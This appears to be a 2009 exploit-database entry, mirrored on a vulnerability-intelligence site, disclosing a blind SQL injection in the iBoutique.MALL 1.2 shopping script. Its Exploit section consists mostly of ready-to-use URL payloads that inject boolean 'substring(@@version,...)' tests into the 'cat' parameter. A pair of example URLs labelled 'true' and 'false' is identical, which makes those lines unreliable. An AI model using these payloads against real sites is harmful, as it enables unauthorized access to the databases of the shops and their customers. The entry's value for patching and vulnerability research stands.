Lucene search

iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability

🗓️ 15 Sep 2009 00:00:00Reported by 0day Today TeamType

zdt🔗 0day.today👁 11 Views

iBoutique.MALL 1.2 Remote Blind SQL Injectio

=================================================================
iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability
=================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   :: iBoutique.MALL 1.2

<<->> download :: http://www.netartmedia.net/mall/
 
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> Exploit :: 
 
                  >>>>>>> http://www.inj3ct0r.com/[path]/index.php?mod=products&cat=230+and+substring(@@version,1,1)=5

                  >>>>>>> http://www.inj3ct0r.com/[path]/index.php?mod=products&cat=230+and+substring(@@version,1,1)=4

                  Note : Dont froget to change catid  
          
                  >>>>>>> http://www.inj3ct0r.com/[path]/index.php?page_id=-1&news_id=1 >>>> true

                  >>>>>>> http://www.inj3ct0r.com/[path]/index.php?page_id=-1&news_id=1 >>>> false


----------------------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net



#  0day.today [2018-03-14]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

15 Sep 2009 00:00Current

7.1High risk

Vulners AI Score7.1